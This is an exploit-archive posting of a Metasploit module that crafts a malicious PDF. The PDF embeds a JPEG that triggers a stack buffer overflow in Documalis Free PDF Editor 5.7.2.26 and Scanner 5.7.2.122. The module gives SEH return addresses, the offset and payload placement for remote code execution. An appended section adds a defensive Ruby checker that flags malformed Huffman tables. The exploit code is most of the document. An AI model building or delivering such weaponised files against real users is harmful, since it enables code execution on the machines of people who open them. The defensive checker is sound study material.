
Documalis Free PDF Editor 5.7.2.26 / Documalis Free PDF Scanner 5.7.2.122 Buffer Overflow

Posted Aug 4, 2020
Authored by metacom | Site metasploit.com

Documalis Free PDF Editor version 5.7.2.26 and Documalis Free PDF Scanner version 5.7.2.122 do not appropriately validate the contents of JPEG images contained within a PDF. Attackers can exploit this vulnerability to trigger a buffer overflow on the stack and gain remote code execution as the user running the Documalis Free PDF Editor or Documalis Free PDF Scanner software.

tags | exploit, remote, overflow, code execution
MD5 | 0d0a1918990afa2cbe664861b2ed5a5d

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::PDF
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Documalis Free PDF Editor and Scanner JPEG Stack Buffer Overflow',
        'Description' => %q{
          Documalis Free PDF Editor version 5.7.2.26 and Documalis Free PDF Scanner version 5.7.2.122 do not
          appropriately validate the contents of JPEG images contained within a PDF. Attackers can exploit
          this vulnerability to trigger a buffer overflow on the stack and gain remote code execution as the
          user running the Documalis Free PDF Editor or Documalis Free PDF Scanner software.
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'metacom', # Vulnerability discovery and PoC
            '<metacom27[at]gmail.com>', # Metasploit module
          ],
        'References' =>
          [
          ],
        'DefaultOptions' =>
          {
            'EXITFUNC' => 'process'
          },
        'Platform' => 'win',
        'Payload' =>
          {
            'Space' => 1715,
            'DisableNops' => true
          },
        'Targets' =>
          [
            [
              'Documalis Free PDF Editor v.5.7.2.26 / Win 7, Win 10',
              {
                'Ret' => 0x0040160D, # pop esi # pop ebx # ret - PDFEditor.exe
                'Offset' => 433
              }
            ],
            [
              'Documalis Free PDF Scanner v.5.7.2.122 / Win 7, Win 10',
              {
                'Ret' => 0x004023FC, # pop edx # pop ebx # ret - DocumentScanner.exe
                'Offset' => 433
              }
            ]
          ],
        'Notes' =>
          {
            'Reliability' => [ REPEATABLE_SESSION ],
            'Stability' => [ CRASH_SERVICE_DOWN ],
            'SideEffects' => [ ARTIFACTS_ON_DISK ]
          },
        'Privileged' => false,
        'DisclosureDate' => 'May 22 2020',
        'DefaultTarget' => 0
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.pdf']),
      ]
    )
  end

  def exploit
    file_create(make_pdf)
  end

  def jpeg
    # Fixed JPEG header: SOI, APP14 (Adobe), DQT, SOF0 and the start of a DHT segment
    buffer = "\xFF\xD8\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65\x00\x64\x80\x00\x00"
    buffer << "\x00\x02\xFF\xDB\x00\x84\x00\x02\x02\x02\x02\x02\x02\x02\x02\x02"
    buffer << "\x02\x03\x02\x02\x02\x03\x04\x03\x03\x03\x03\x04\x05\x04\x04\x04"
    buffer << "\x04\x04\x05\x05\x05\x05\x05\x05\x05\x05\x05\x05\x07\x08\x08\x08"
    buffer << "\x07\x05\x09\x0A\x0A\x0A\x0A\x09\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C"
    buffer << "\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x01\x03\x02\x02\x03\x03\x03\x07\x05"
    buffer << "\x05\x07\x0D\x0A\x09\x0A\x0D\x0F\x0D\x0D\x0D\x0D\x0F\x0F\x0C\x0C"
    buffer << "\x0C\x0C\x0C\x0F\x0F\x0C\x0C\x0C\x0C\x0C\x0C\x0F\x0C\x0E\x0E\x0E"
    buffer << "\x0E\x0E\x0C\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11"
    buffer << "\x11\x11\x11\x11\x11\x11\x11\x11\xFF\xC0\x00\x14\x08\x00\x32\x00"
    buffer << "\xE6\x04\x01\x11\x00\x02\x11\x01\x03\x11\x01\x04\x11\x00\xFF\xC4"
    buffer << "\x01\xA2\x00\x00\x00\x07\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00"
    buffer << "\x00\x00\x00\x04\x05\x03\x02\x06\x01\x00\x07\x08\x09\x0A\x0B\x01"
    buffer << "\x54\x02\x02\x03\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00"
    buffer << "\x01\x00\x02\x03\x04\x05\x06\x07"
    buffer << rand_text(target['Offset']) # Junk
    buffer << generate_seh_record(target.ret)
    buffer << payload.encoded
    # Pad the JPEG stream to a fixed total of 2388 bytes
    buffer << rand_text(2388 - buffer.length)
    buffer
  end

  def make_pdf
    @pdf << header
    add_object(1, '<</Type/Catalog/Outlines 2 0 R /Pages 3 0 R>>')
    add_object(2, '<</Type/Outlines>>')
    add_object(3, '<</Type/Pages/Kids[5 0 R]/Count 1/Resources <</ProcSet 4 0 R/XObject <</I0 7 0 R>>>>/MediaBox[0 0 612.0 792.0]>>')
    add_object(4, '[/PDF/Text/ImageC]')
    add_object(5, '<</Type/Page/Parent 3 0 R/Contents 6 0 R>>')
    stream_1 = 'stream' << eol
    stream_1 << '0.000 0.000 0.000 rg 0.000 0.000 0.000 RG q 265.000 0 0 229.000 41.000 522.000 cm /I0 Do Q' << eol
    stream_1 << 'endstream' << eol
    add_object(6, "<</Length 91>>#{stream_1}")
    stream = '<<' << eol
    stream << '/Width 230' << eol
    stream << '/BitsPerComponent 8' << eol
    stream << '/Name /X' << eol
    stream << '/Height 50' << eol
    stream << '/Intent /RelativeColorimetric' << eol
    stream << '/Subtype /Image' << eol
    stream << '/Filter /DCTDecode' << eol
    stream << "/Length #{jpeg.length}" << eol
    stream << '/ColorSpace /DeviceCMYK' << eol
    stream << '/Type /XObject' << eol
    stream << '>>'
    stream << 'stream' << eol
    stream << jpeg << eol
    stream << 'endstream' << eol
    add_object(7, stream)
    finish_pdf
  end
end
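
Added example (not part of the original module or post): the header bytes in the module's jpeg method open a DHT (FF C4) segment whose second table declares 0x54 codes of length 1, a count no valid Huffman table can have. The page does not say which field the vulnerable parser mishandles, so the Ruby sketch below is only a generic pre-parse sanity check for a /DCTDecode stream that has already been extracted from a PDF; the function names and sample inputs are constructed for illustration.

```ruby
# Validate every table packed into one DHT payload; returns finding strings.
def check_dht(tables, seg_pos)
  findings = []
  off = 0
  while off + 17 <= tables.bytesize
    id = tables.getbyte(off)
    counts = tables.byteslice(off + 1, 16).bytes # codes of length 1..16
    total = counts.sum
    # Kraft sum: each code of length i takes 2^-i of the code space.
    kraft = counts.each_with_index.sum { |n, i| Rational(n, 2**(i + 1)) }
    where = format('DHT at offset %d, table 0x%02X', seg_pos, id)
    findings << "#{where}: #{total} symbols exceeds 256" if total > 256
    findings << "#{where}: code counts over-subscribe the code space" if kraft > 1
    if off + 17 + total > tables.bytesize
      findings << "#{where}: symbol list runs past the segment"
      break
    end
    off += 17 + total
  end
  findings
end

# Walk the marker segments after SOI up to SOS and collect findings.
def dht_findings(jpeg)
  data = jpeg.b
  return ['missing SOI marker'] unless data.start_with?("\xFF\xD8".b)
  findings = []
  pos = 2
  while pos + 4 <= data.bytesize
    marker, length = data.byteslice(pos, 4).unpack('nn')
    break if (marker >> 8) != 0xFF || marker == 0xFFDA # lost sync or SOS
    if length < 2 || pos + 2 + length > data.bytesize
      findings << format('segment 0x%04X at offset %d overruns the file', marker, pos)
      break
    end
    payload = data.byteslice(pos + 4, length - 2)
    findings.concat(check_dht(payload, pos)) if marker == 0xFFC4
    pos += 2 + length
  end
  findings
end

# Constructed sample builder (not a real image): SOI, one DHT table, EOI.
def sample_jpeg(counts)
  table = [0x00, *counts].pack('C*') + ("\x00".b * counts.sum)
  "\xFF\xD8".b + [0xFFC4, table.bytesize + 2].pack('nn') + table + "\xFF\xD9".b
end
VALID_COUNTS = [0, 0, 7, 1, 1, 1, 1, 1] + [0] * 8
BAD_COUNTS = [0x54, 2, 2, 3, 1, 1, 1, 1, 1] + [0] * 7 # 0x54 codes of length 1
```

Calling dht_findings(sample_jpeg(BAD_COUNTS)) returns one over-subscription finding, while the VALID_COUNTS sample returns an empty list; a mail or upload filter could quarantine any PDF whose embedded JPEG produces a finding.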